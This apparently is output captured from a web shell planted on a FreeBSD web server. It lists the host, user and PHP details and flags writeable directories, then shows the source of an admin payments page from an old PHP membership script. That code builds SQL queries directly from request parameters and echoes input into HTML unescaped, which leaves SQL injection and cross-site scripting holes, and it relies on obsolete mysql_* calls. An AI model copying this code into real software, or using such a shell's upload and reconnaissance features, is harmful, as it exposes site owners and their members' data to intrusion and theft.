KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/abtechsci/mmc15/Membership/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/abtechsci/mmc15/Membership/admin/payments.php
<?php
/************* Membership V2.0 *******************/
/*
Released by AwesomePHP.com, under the GPL License, a
copy of it should be attached to the zip file, or
you can view it on http://AwesomePHP.com/gpl.txt
*/
/************* Membership V2.0 *******************/	
if($is_admin == false){ die();}

if($_POST['payment_id'] == NULL){$_POST['payment_id'] = $_GET['payment_id'];}


if(!is_numeric($_POST['payment_id']) AND $_GET['do'] != 'Add'){	
	$get_list = "SELECT * FROM `memb_payments`";
	if($_GET['user_id'] != NULL){ $get_list .= " WHERE `user_id`='$_GET[user_id]'";}
	if($_GET['membership_id'] != NULL){ $get_list .= " WHERE `membership_id`='$_GET[membership_id]'";}

	$is_count = @mysql_query($get_list);
	$display_limit = '10'; 
	$items_count = @mysql_num_rows($is_count); 
	if($items_count > $display) { 
		$page_count = ceil ($items_count/$display_limit); 
	} else { 
		$page_count = 1; 
	}
	if(is_numeric($second_var)){ 
	    $start = $_GET['start']; 
	} else { 
	    $start = 0; 
	} 
	$get_users = @mysql_query($get_list . " ORDER BY `payment_id` ASC LIMIT $start,$display_limit");


?>
  <table width="100%"  border="1" cellspacing="0" cellpadding="5">
    <tr bgcolor="#BEDEDE">
      <td colspan="5"><div align="center"><font color="#999999" size="4"><strong>Payment List  [<a href="?page=payments&do=Add">Add</a>] </strong></font></div></td>
    </tr>
	<?php
	if($items_count > $display_limit){
	?>
    <tr>
      <td colspan="5"><div align="center"><?php include('pagination.php');?></div></td>
    </tr>
	<?php } ?>
    <tr bgcolor="#CAFFCA">
      <td width="16%"><div align="center"><font size="2"><strong>Payment Amount </strong></font></div></td>
      <td width="16%" bgcolor="#CAFFCA"><div align="center"><font size="2"><strong>Membership</strong></font></div></td>
      <td width="16%"><div align="center"><font size="2"><strong>User</strong></font></div></td>
      <td width="16%" bgcolor="#CAFFCA"><div align="center"><font size="2"><strong>Payment Date</strong></font></div></td>
      <td width="16%"><div align="center"><font size="2"><strong>Options</strong></font></div></td>
    </tr>
	<?php
	if($items_count <= 0){ echo '<tr><td colspan="4">No payments found.</td><tr>';}
	while($each = mysql_fetch_assoc($get_users)){
		$get_name = mysql_fetch_assoc(mysql_query("SELECT `user_name` FROM `memb_userlist` WHERE `user_id`='$each[user_id]'"));
		$get_Mname = mysql_fetch_assoc(mysql_query("SELECT `membership_title` FROM `memb_memberships` 
		WHERE `membership_id`='$each[membership_id]'"));
	?>
    <tr>
      <td width="16%"><font color="#990000" size="2"><?php echo '$'.number_format($each['rate_amount'],2);?></font></td>
      <td width="16%"><font color="#990000" size="2"><?php echo $get_Mname['membership_title'];?></font></td>
      <td width="16%"><font color="#990000" size="2">
        <?php echo $get_name['user_name'];?>
      </font></td>
      <td width="16%"><font color="#990000" size="2"><?php echo $each['payment_date'];?></font></td>
      <td width="16%"><div align="center"><font size="2">[<a href="?page=payments&payment_id=<?php echo $each['payment_id'];?>">Edit/Remove</a>]</font></div></td>
    </tr>
	<?php } ?>
</table>
<?php } else { 
	if($_POST['payment_id'] != NULL){
		$_POST = mysql_fetch_assoc(mysql_query("SELECT * FROM `memb_payments` WHERE `payment_id`='$_POST[payment_id]'"));
	}
	?>  
  <form name="payments" id="payments" method="post" action="?page=payments&payment_id=<?php echo $first_var;?>" style="display:inline;">
  <table width="100%"  border="1" cellspacing="0" cellpadding="5">
    <tr bgcolor="#BEDEDE">
      <td colspan="2"><div align="center"><font color="#999999" size="4"><strong>Add/Edit Payment: </strong></font></div></td>
    </tr>
    <tr>
      <td width="50%"><font size="2">User:</font></td>
      <td width="50%"><font size="2">
	    <select id="user_id" name="user_id" class="hiddenText">
          <?php
	  $query = mysql_query("SELECT * FROM `memb_userlist`");
	  
	  while($em = mysql_fetch_assoc($query)){
	  	if($_POST['user_id'] == $em['user_id']){ $sel= ' selected';}else{$sel=NULL;}
	  	echo '<option value="'.$em['user_id'].'"'.$sel.'>'.$em['user_name'].' ('.$em['user_email'].')</option>';
	  }
	  ?>
        </select>
      </font></td>
    </tr>
    <tr>
      <td width="50%"><font size="2">Membership Type: </font></td>
      <td width="50%"><font size="2">
	  <select id="membership_id" name="membership_id" class="hiddenText">
	  <?php
	  $query = mysql_query("SELECT * FROM `memb_memberships`");
	  
	  while($em = mysql_fetch_assoc($query)){
	  	if($_POST['membership_id'] == $em['membership_id']){ $sel= ' selected';}else{$sel=NULL;}
	  	echo '<option value="'.$em['membership_id'].'"'.$sel.'>'.$em['membership_title'].'</option>';
	  }
	  ?>
	  </select>
        
      </font></td>
    </tr>
    <tr>
      <td width="50%"><font size="2">Membership Rate: </font></td>
      <td><font size="2">
        <select id="rate_id" name="rate_id" class="hiddenText">
          <?php
	  $query = mysql_query("SELECT * FROM `memb_memberships_rates` WHERE `membership_id`='$_POST[membership_id]'");
	  
	  while($em = mysql_fetch_assoc($query)){
	  	if($_POST['rate_id'] == $em['rate_id']){ $sel= ' selected';}else{$sel=NULL;}
	  	echo '<option value="'.$em['rate_id'].'"'.$sel.'>'.$em['rate_title'].'</option>';
	  }
	  ?>
                </select>
      </font></td>
    </tr>
    <tr>
      <td><font size="2">Payment Date: </font></td>
      <td width="50%"><font size="2">
        <input name="payment_date" type="text" id="payment_date" value="<?php echo $_POST['payment_date'];?>" class="hiddenText">
      </font></td>
    </tr>
    <tr>
      <td><font size="2">Payment Amount:</font></td>
      <td width="50%"><font size="2">
        <input name="rate_amount" type="text" id="rate_amount" value="<?php echo $_POST['rate_amount'];?>" class="hiddenText">
		00.00 Format
      </font></td>
    </tr>
    <tr>
      <td width="50%"><font size="2">Payment Method: </font></td>
      <td width="50%"><font size="2">
        <select id="system_id" name="system_id" class="hiddenText">
          <?php
	  $query = mysql_query("SELECT * FROM `memb_paysystem`");
	  
	  while($em = mysql_fetch_assoc($query)){
	  	if($_POST['system_id'] == $em['system_id']){ $sel= ' selected';}else{$sel=NULL;}
	  	echo '<option value="'.$em['system_id'].'"'.$sel.'>'.$em['system_title'].'</option>';
	  }
	  ?>
                </select>
</font></td>
    </tr>
    <tr bgcolor="#BEDEDE">
      <td colspan="2"><div align="center">
        <font size="2">
        <input type="submit" name="Submit" value="Submit" class="button">
        <input name="doid" type="hidden" id="doid" value="7">
        <input name="payment_id" type="hidden" id="payment_id" value="<?php echo $_POST['payment_id'];?>">
        </font></div></td>
    </tr>
    <tr bgcolor="#CAFFCA">
      <td height="31" colspan="2"><div align="right"><font size="1">
        <input type="checkbox" id="do_delete" name="do_delete" value="yes">
Delete</font></div></td>
    </tr>
  </table>
</form>
<?php } ?>

Anon7 - 2021